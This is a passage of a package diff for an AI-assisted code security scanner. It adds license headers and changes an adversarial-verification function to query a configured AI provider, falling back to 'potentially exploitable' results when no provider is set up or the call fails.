AAC,CAAC;QACL,CAAC;QAAC,OAAO,KAAK,EAAE,CAAC;YACf,oCAAoC;YACpC,OAAO,CAAC,KAAK,CAAC,mBAAmB,IAAI,GAAG,EAAE,KAAK,CAAC,CAAC;QACnD,CAAC;IACH,CAAC;IAED,OAAO,WAAW,CAAC;AACrB,CAAC;AAED;;GAEG;AACH,MAAM,UAAU,kBAAkB,CAAC,UAA4B;IAC7D,MAAM,OAAO,GAAG,EAAE,CAAC;IAEnB,uBAAuB;IACvB,OAAO,CAAC,IAAI,CAAC;QACX,KAAK,EAAE,oBAAoB;QAC3B,IAAI,EAAE,UAAU;QAChB,WAAW,EAAE,CAAC,UAAU,CAAC;QACzB,OAAO,EAAE;YACP,OAAO,EAAE,eAAe;YACxB,KAAK,EAAE,WAAW;YAClB,SAAS,EAAE,CAAC,UAAU,CAAC,IAAI,EAAE,UAAU,CAAC,IAAI,CAAC;SAC9C;KACF,CAAC,CAAC;IAEH,qBAAqB;IACrB,OAAO,CAAC,IAAI,CAAC;QACX,KAAK,EAAE,uBAAuB;QAC9B,IAAI,EAAE,MAAM;QACZ,WAAW,EAAE,CAAC,UAAU,CAAC;QACzB,OAAO,EAAE;YACP,OAAO,EAAE,mBAAmB;YAC5B,KAAK,EAAE,cAAc;YACrB,SAAS,EAAE,CAAC,UAAU,CAAC;SACxB;KACF,CAAC,CAAC;IAEH,OAAO,OAAO,CAAC;AACjB,CAAC;AAED;;GAEG;AACH,MAAM,CAAC,MAAM,QAAQ,GAAG;IACtB,gBAAgB,EAAE,KAAK,EAAE,GAAW,EAAE,EAAE;QACtC,MAAM,MAAM,GAAG,MAAM,SAAS,CAAC,GAAG,CAAC,CAAC;QACpC,OAAO,iBAAiB,CAAC,MAAM,CAAC,CAAC;IACnC,CAAC;IAED,eAAe,EAAE,KAAK,EAAE,IAAY,EAAE,IAAY,EAAE,EAAE;QACpD,kCAAkC;QAClC,OAAO,aAAa,CAAC;IACvB,CAAC;IAED,mBAAmB,EAAE,KAAK,EAAE,UAA4B,EAAE,EAAE;QAC1D,OAAO,mBAAmB,UAAU,CAAC,OAAO,aAAa,UAAU,CAAC,IAAI,IAAI,UAAU,CAAC,IAAI,EAAE,CAAC;IAChG,CAAC;CACF,CAAC"}
|
|
@@ -1,7 +1,14 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* FivoSense - AI Security Scanner
|
|
3
|
+
* Copyright (c) 2026 thevinsoni
|
|
4
|
+
* Licensed under the MIT License
|
|
5
|
+
* https://github.com/thevinsoni/sense
|
|
6
|
+
*/
|
|
1
7
|
/**
|
|
2
8
|
* Adversarial Verification - AI attacker proves exploitability
|
|
3
9
|
*/
|
|
4
10
|
import { TaintTrace } from './taint.js';
|
|
11
|
+
import { type AIProvider } from '../ai/client.js';
|
|
5
12
|
export interface AdversarialResult {
|
|
6
13
|
exploitable: boolean;
|
|
7
14
|
confidence: number;
|
|
@@ -18,7 +25,7 @@ export declare function buildAdversarialPrompt(trace: TaintTrace, code: string):
|
|
|
18
25
|
*/
|
|
19
26
|
export declare function parseAdversarialResult(response: string): AdversarialResult | null;
|
|
20
27
|
/**
|
|
21
|
-
*
|
|
28
|
+
* Verify exploitability using adversarial AI
|
|
22
29
|
*/
|
|
23
|
-
export declare function verifyWithAdversary(trace: TaintTrace, code: string): Promise<AdversarialResult>;
|
|
30
|
+
export declare function verifyWithAdversary(trace: TaintTrace, code: string, provider?: AIProvider): Promise<AdversarialResult>;
|
|
24
31
|
//# sourceMappingURL=adversary.d.ts.map
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"adversary.d.ts","sourceRoot":"","sources":["../../src/engine/adversary.ts"],"names":[],"mappings":"AAAA;;GAEG;AAEH,OAAO,EAAE,UAAU,EAAE,MAAM,YAAY,CAAC;
|
|
1
|
+
{"version":3,"file":"adversary.d.ts","sourceRoot":"","sources":["../../src/engine/adversary.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AAEH;;GAEG;AAEH,OAAO,EAAE,UAAU,EAAE,MAAM,YAAY,CAAC;AACxC,OAAO,EAAgC,KAAK,UAAU,EAAE,MAAM,iBAAiB,CAAC;AAEhF,MAAM,WAAW,iBAAiB;IAChC,WAAW,EAAE,OAAO,CAAC;IACrB,UAAU,EAAE,MAAM,CAAC;IACnB,YAAY,EAAE,MAAM,CAAC;IACrB,OAAO,EAAE,MAAM,CAAC;IAChB,SAAS,EAAE,MAAM,CAAC;CACnB;AAED;;GAEG;AACH,wBAAgB,sBAAsB,CAAC,KAAK,EAAE,UAAU,EAAE,IAAI,EAAE,MAAM,GAAG,MAAM,CAuC9E;AAED;;GAEG;AACH,wBAAgB,sBAAsB,CAAC,QAAQ,EAAE,MAAM,GAAG,iBAAiB,GAAG,IAAI,CAiBjF;AAED;;GAEG;AACH,wBAAsB,mBAAmB,CACvC,KAAK,EAAE,UAAU,EACjB,IAAI,EAAE,MAAM,EACZ,QAAQ,CAAC,EAAE,UAAU,GACpB,OAAO,CAAC,iBAAiB,CAAC,CA+C5B"}
|
package/dist/engine/adversary.js
CHANGED
|
@@ -1,6 +1,10 @@
|
|
|
1
1
|
/**
|
|
2
|
-
*
|
|
2
|
+
* FivoSense - AI Security Scanner
|
|
3
|
+
* Copyright (c) 2026 thevinsoni
|
|
4
|
+
* Licensed under the MIT License
|
|
5
|
+
* https://github.com/thevinsoni/sense
|
|
3
6
|
*/
|
|
7
|
+
import { callAI, getAIProviderFromEnv } from '../ai/client.js';
|
|
4
8
|
/**
|
|
5
9
|
* Generate adversarial attack prompt
|
|
6
10
|
*/
|
|
@@ -66,18 +70,48 @@ export function parseAdversarialResult(response) {
|
|
|
66
70
|
}
|
|
67
71
|
}
|
|
68
72
|
/**
|
|
69
|
-
*
|
|
73
|
+
* Verify exploitability using adversarial AI
|
|
70
74
|
*/
|
|
71
|
-
export async function verifyWithAdversary(trace, code) {
|
|
72
|
-
|
|
73
|
-
|
|
74
|
-
|
|
75
|
-
|
|
76
|
-
|
|
77
|
-
|
|
78
|
-
|
|
79
|
-
|
|
80
|
-
|
|
81
|
-
|
|
75
|
+
export async function verifyWithAdversary(trace, code, provider) {
|
|
76
|
+
// Get provider from env if not provided
|
|
77
|
+
const aiProvider = provider || getAIProviderFromEnv();
|
|
78
|
+
// If no AI provider available, return conservative result
|
|
79
|
+
if (!aiProvider) {
|
|
80
|
+
console.warn('⚠️ No AI provider configured for adversarial verification');
|
|
81
|
+
console.warn('💡 Set OPENAI_API_KEY, ANTHROPIC_API_KEY, or OLLAMA_HOST to enable');
|
|
82
|
+
return {
|
|
83
|
+
exploitable: true,
|
|
84
|
+
confidence: 0.7,
|
|
85
|
+
attackVector: 'Adversarial verification not configured',
|
|
86
|
+
payload: '',
|
|
87
|
+
reasoning: 'Marked as potentially exploitable - configure AI provider to verify',
|
|
88
|
+
};
|
|
89
|
+
}
|
|
90
|
+
try {
|
|
91
|
+
const prompt = buildAdversarialPrompt(trace, code);
|
|
92
|
+
const response = await callAI(aiProvider, prompt);
|
|
93
|
+
const result = parseAdversarialResult(response.text);
|
|
94
|
+
if (!result) {
|
|
95
|
+
console.warn('⚠️ Failed to parse adversarial response');
|
|
96
|
+
return {
|
|
97
|
+
exploitable: true,
|
|
98
|
+
confidence: 0.6,
|
|
99
|
+
attackVector: 'Failed to parse AI response',
|
|
100
|
+
payload: '',
|
|
101
|
+
reasoning: 'Parser error - marked as potentially exploitable',
|
|
102
|
+
};
|
|
103
|
+
}
|
|
104
|
+
return result;
|
|
105
|
+
}
|
|
106
|
+
catch (error) {
|
|
107
|
+
console.warn(`⚠️ Adversarial verification failed: ${error instanceof Error ? error.message : 'Unknown error'}`);
|
|
108
|
+
return {
|
|
109
|
+
exploitable: true,
|
|
110
|
+
confidence: 0.7,
|
|
111
|
+
attackVector: `AI verification failed: ${error instanceof Error ? error.message : 'Unknown error'}`,
|
|
112
|
+
payload: '',
|
|
113
|
+
reasoning: 'Marked as potentially exploitable due to verification error',
|
|
114
|
+
};
|
|
115
|
+
}
|
|
82
116
|
}
|
|
83
117
|
//# sourceMappingURL=adversary.js.map
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"adversary.js","sourceRoot":"","sources":["../../src/engine/adversary.ts"],"names":[],"mappings":"AAAA
|
|
1
|
+
{"version":3,"file":"adversary.js","sourceRoot":"","sources":["../../src/engine/adversary.ts"],"names":[],"mappings":"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"}
|
package/dist/engine/graph.d.ts
CHANGED
|
@@ -1,5 +1,8 @@
|
|
|
1
1
|
/**
|
|
2
|
-
*
|
|
2
|
+
* FivoSense - AI Security Scanner
|
|
3
|
+
* Copyright (c) 2026 thevinsoni
|
|
4
|
+
* Licensed under the MIT License
|
|
5
|
+
* https://github.com/thevinsoni/sense
|
|
3
6
|
*/
|
|
4
7
|
import * as t from '@babel/types';
|
|
5
8
|
import { SourcePattern } from './sources.js';
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"graph.d.ts","sourceRoot":"","sources":["../../src/engine/graph.ts"],"names":[],"mappings":"AAAA
|
|
1
|
+
{"version":3,"file":"graph.d.ts","sourceRoot":"","sources":["../../src/engine/graph.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AAQH,OAAO,KAAK,CAAC,MAAM,cAAc,CAAC;AAClC,OAAO,EAAY,aAAa,EAAE,MAAM,cAAc,CAAC;AACvD,OAAO,EAAU,WAAW,EAAE,MAAM,YAAY,CAAC;AAKjD,MAAM,WAAW,YAAY;IAC3B,EAAE,EAAE,MAAM,CAAC;IACX,IAAI,EAAE,QAAQ,GAAG,MAAM,GAAG,UAAU,GAAG,UAAU,CAAC;IAClD,IAAI,EAAE,MAAM,CAAC;IACb,KAAK,CAAC,EAAE,MAAM,CAAC;IACf,GAAG,CAAC,EAAE,CAAC,CAAC,cAAc,GAAG,IAAI,CAAC;IAC9B,aAAa,CAAC,EAAE,aAAa,CAAC;IAC9B,WAAW,CAAC,EAAE,WAAW,CAAC;CAC3B;AAED,MAAM,WAAW,YAAY;IAC3B,IAAI,EAAE,MAAM,CAAC;IACb,EAAE,EAAE,MAAM,CAAC;IACX,IAAI,EAAE,YAAY,GAAG,MAAM,GAAG,QAAQ,GAAG,WAAW,CAAC;IACrD,GAAG,CAAC,EAAE,CAAC,CAAC,cAAc,GAAG,IAAI,CAAC;CAC/B;AAED,MAAM,WAAW,SAAS;IACxB,MAAM,EAAE,YAAY,CAAC;IACrB,IAAI,EAAE,YAAY,CAAC;IACnB,IAAI,EAAE,YAAY,EAAE,CAAC;IACrB,SAAS,EAAE,OAAO,CAAC;IACnB,UAAU,EAAE,MAAM,CAAC;CACpB;AAED,MAAM,WAAW,aAAa;IAC5B,KAAK,EAAE,GAAG,CAAC,MAAM,EAAE,YAAY,CAAC,CAAC;IACjC,KAAK,EAAE,YAAY,EAAE,CAAC;IACtB,UAAU,EAAE,SAAS,EAAE,CAAC;CACzB;AAOD,wBAAgB,kBAAkB,CAAC,IAAI,EAAE,MAAM,EAAE,QAAQ,SAAa,GAAG,aAAa,CAuGrF;AAED,wBAAgB,kBAAkB,CAAC,KAAK,EAAE,aAAa,GAAG,SAAS,EAAE,CAEpE;AAED,wBAAgB,kBAAkB,CAAC,KAAK,EAAE,aAAa,EAAE,QAAQ,EAAE,UAAU,GAAG,MAAM,GAAG,QAAQ,GAAG,SAAS,EAAE,CAE9G;AAED,wBAAgB,eAAe,CAAC,IAAI,EAAE,SAAS,GAAG,MAAM,CAIvD"}
|
package/dist/engine/graph.js
CHANGED
package/dist/engine/graph.js.map
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"graph.js","sourceRoot":"","sources":["../../src/engine/graph.ts"],"names":[],"mappings":"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"}
|
|
1
|
+
{"version":3,"file":"graph.js","sourceRoot":"","sources":["../../src/engine/graph.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AAEH;;GAEG;AAEH,OAAO,EAAE,KAAK,EAAE,MAAM,eAAe,CAAC;AACtC,OAAO,cAAc,MAAM,iBAAiB,CAAC;AAC7C,OAAO,KAAK,CAAC,MAAM,cAAc,CAAC;AAClC,OAAO,EAAE,QAAQ,EAAiB,MAAM,cAAc,CAAC;AACvD,OAAO,EAAE,MAAM,EAAe,MAAM,YAAY,CAAC;AAEjD,sCAAsC;AACtC,MAAM,QAAQ,GAAG,OAAO,cAAc,KAAK,UAAU,CAAC,CAAC,CAAC,cAAc,CAAC,CAAC,CAAC,cAAc,CAAC,OAAO,CAAC;AAiChG,MAAM,UAAU,GAAG,IAAI,GAAG,CAAC;IACzB,UAAU,EAAE,YAAY,EAAE,QAAQ,EAAE,QAAQ,EAAE,YAAY,EAAE,UAAU;IACtE,kBAAkB,EAAE,gBAAgB,EAAE,oBAAoB,EAAE,WAAW;CACxE,CAAC,CAAC;AAEH,MAAM,UAAU,kBAAkB,CAAC,IAAY,EAAE,QAAQ,GAAG,UAAU;IACpE,MAAM,GAAG,GAAG,KAAK,CAAC,IAAI,EAAE;QACtB,UAAU,EAAE,QAAQ;QACpB,OAAO,EAAE,CAAC,KAAK,EAAE,YAAY,CAAC;QAC9B,aAAa,EAAE,IAAI;KACpB,CAAC,CAAC;IAEH,MAAM,KAAK,GAAkB,EAAE,KAAK,EAAE,IAAI,GAAG,EAAE,EAAE,KAAK,EAAE,EAAE,EAAE,UAAU,EAAE,EAAE,EAAE,CAAC;IAC7E,MAAM,WAAW,GAAG,IAAI,GAAG,EAA6E,CAAC;IACzG,IAAI,aAAa,GAAG,CAAC,CAAC;IACtB,MAAM,SAAS,GAAG,GAAG,EAAE,CAAC,QAAQ,aAAa,EAAE,EAAE,CAAC;IAElD,SAAS,OAAO,CAAC,IAAkB;QACjC,KAAK,CAAC,KAAK,CAAC,GAAG,CAAC,IAAI,CAAC,EAAE,EAAE,IAAI,CAAC,CAAC;QAC/B,OAAO,IAAI,CAAC;IACd,CAAC;IAED,SAAS,YAAY,CAAC,IAAY;QAChC,IAAI,CAAC,CAAC,kBAAkB,CAAC,IAAI,CAAC,EAAE,CAAC;YAC/B,MAAM,GAAG,GAAG,YAAY,CAAC,IAAI,CAAC,MAAM,CAAC,CAAC;YACtC,MAAM,IAAI,GAAG,CAAC,CAAC,YAAY,CAAC,IAAI,CAAC,QAAQ,CAAC,CAAC,CAAC,CAAC,IAAI,CAAC,QAAQ,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CAAC;YACrE,OAAO,GAAG,GAAG,IAAI,IAAI,EAAE,CAAC;QAC1B,CAAC;QACD,OAAO,CAAC,CAAC,YAAY